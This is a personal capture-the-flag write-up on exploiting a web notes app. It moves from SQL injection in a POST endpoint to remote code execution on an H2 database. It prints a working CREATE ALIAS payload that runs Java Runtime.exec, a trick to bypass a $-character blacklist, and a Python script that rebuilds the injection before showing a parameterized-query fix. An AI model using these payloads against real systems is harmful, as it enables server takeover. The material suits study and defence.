PentestNotes.md
Category: #Web
Rated Difficulty: #Easy
Personal Difficulty: #Difficult

Started the machine and tried to see if there is any [[SQL Injection]] in the login field. Checked the code and saw that it uses secure coding for the login form.

Once logged in, I get to see the notes. Found that it makes a call to `/api/notes`, then checked against the code and found there is a [[HTTP#Common HTTP Methods|GET]] and a [[HTTP#Common HTTP Methods|POST]] method.

Made a request to the [[HTTP#Common HTTP Methods|POST]] method with the param and found that it is vulnerable because it used a format string. Sample payload: `' or 1=1 -- `

But that does not lead to anything. Then googled about the [[H2]] database to see if I can perform [[Remote Code Execution(RCE)]] on it and found a way.

It allows running [[Java]] code on `alias`. With that knowledge I googled for a payload that can be used and found one on [ExploitDB](https://www.exploit-db.com/exploits/44422), but since it blacklisted the *$* character, I switched the *\$\$* to `'.....'`.

Final payload looks something like this:
`'; CREATE ALIAS EXECVE AS ' String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }';`

Called the function like this `'; SELECT null,null, execve('whoami');` and got the flag.
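To see what the format-string injection and the `$$` to `'...'` substitution actually do to the query text, here is an added Python example (my own, not the machine's code and not the exploit-db script). It reconstructs the vulnerable query builder as a hypothetical `String.format`-style template, because the application's real query is not on the page; it assumes the POST body is JSON, which would explain why the `\\A` in the payload above carries four backslashes (two for the Java literal, doubled again by JSON); and it ends with the parameterized query that would have closed the hole. Everything else (table and column names, the `title` field) is made up for the example.

```python
import json

# Java body of the alias, taken from the CREATE ALIAS payload in the note.
# The Java literal "\\A" is two backslashes in the SQL text, so this
# non-raw Python string needs four.
JAVA_BODY = (
    ' String execve(String cmd) throws java.io.IOException { '
    'java.util.Scanner s = new java.util.Scanner('
    'Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); '
    'return s.hasNext() ? s.next() : ""; }'
)

BLACKLIST = "$"  # the filter the note describes: the literal $ character is rejected


def sql_quote(text: str) -> str:
    """Wrap text in a standard SQL string literal, doubling any embedded quote."""
    return "'" + text.replace("'", "''") + "'"


def build_alias(java_body: str, dollar_quoted: bool) -> str:
    """CREATE ALIAS, either with H2's $$...$$ quoting or with a plain '...' literal."""
    body = "$$" + java_body + "$$" if dollar_quoted else sql_quote(java_body)
    return "CREATE ALIAS EXECVE AS " + body


def passes_blacklist(payload: str) -> bool:
    return BLACKLIST not in payload


def vulnerable_query(user_input: str) -> str:
    """Hypothetical reconstruction of a String.format-style query builder.
    The real query text of the application is not on the page."""
    return "SELECT id, title FROM notes WHERE title = '%s'" % user_input


def split_statements(sql: str) -> list[str]:
    """Split on ';' outside string literals; '--' outside a literal drops the rest of the line.
    Shows why a naive ';' or quote count does not see the stacked statement."""
    stmts, cur, in_str, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            if in_str and sql.startswith("''", i):  # escaped quote inside a literal
                cur.append("''")
                i += 2
                continue
            in_str = not in_str
            cur.append(ch)
        elif ch == ";" and not in_str:
            stmts.append("".join(cur).strip())
            cur = []
        elif not in_str and sql.startswith("--", i):
            nl = sql.find("\n", i)
            i = len(sql) if nl < 0 else nl
            continue
        else:
            cur.append(ch)
        i += 1
    tail = "".join(cur).strip()
    if tail:
        stmts.append(tail)
    return stmts


def injection_payload(statement: str) -> str:
    """Close the surrounding literal, stack our statement, comment out the original tail."""
    return "'; " + statement + "; -- "


def json_body(payload: str) -> str:
    """Assumed request encoding (JSON); every backslash doubles again in the JSON text."""
    return json.dumps({"title": payload})


def parameterized_query(user_input: str) -> tuple[str, tuple[str, ...]]:
    """The fix: the payload travels as a bound parameter, never as SQL text."""
    return "SELECT id, title FROM notes WHERE title = ?", (user_input,)


if __name__ == "__main__":
    alias = build_alias(JAVA_BODY, dollar_quoted=False)
    payload = injection_payload(alias)
    print("blocked by $ filter:", not passes_blacklist(payload))
    for stmt in split_statements(vulnerable_query(payload)):
        print("STATEMENT:", stmt[:70], "...")
    print("JSON body:", json_body(payload)[:90], "...")
    call = injection_payload("SELECT null, null, execve('whoami')")
    print(split_statements(vulnerable_query(call)))
```

The `$$` form of the same alias fails `passes_blacklist`, the `'...'` form passes it, and the quote-aware splitter shows the server ends up with two statements: the original `SELECT` with an empty title, then the `CREATE ALIAS`. The same splitter applied to `parameterized_query` is pointless by design: the driver never concatenates the value into the text, so there is nothing to split.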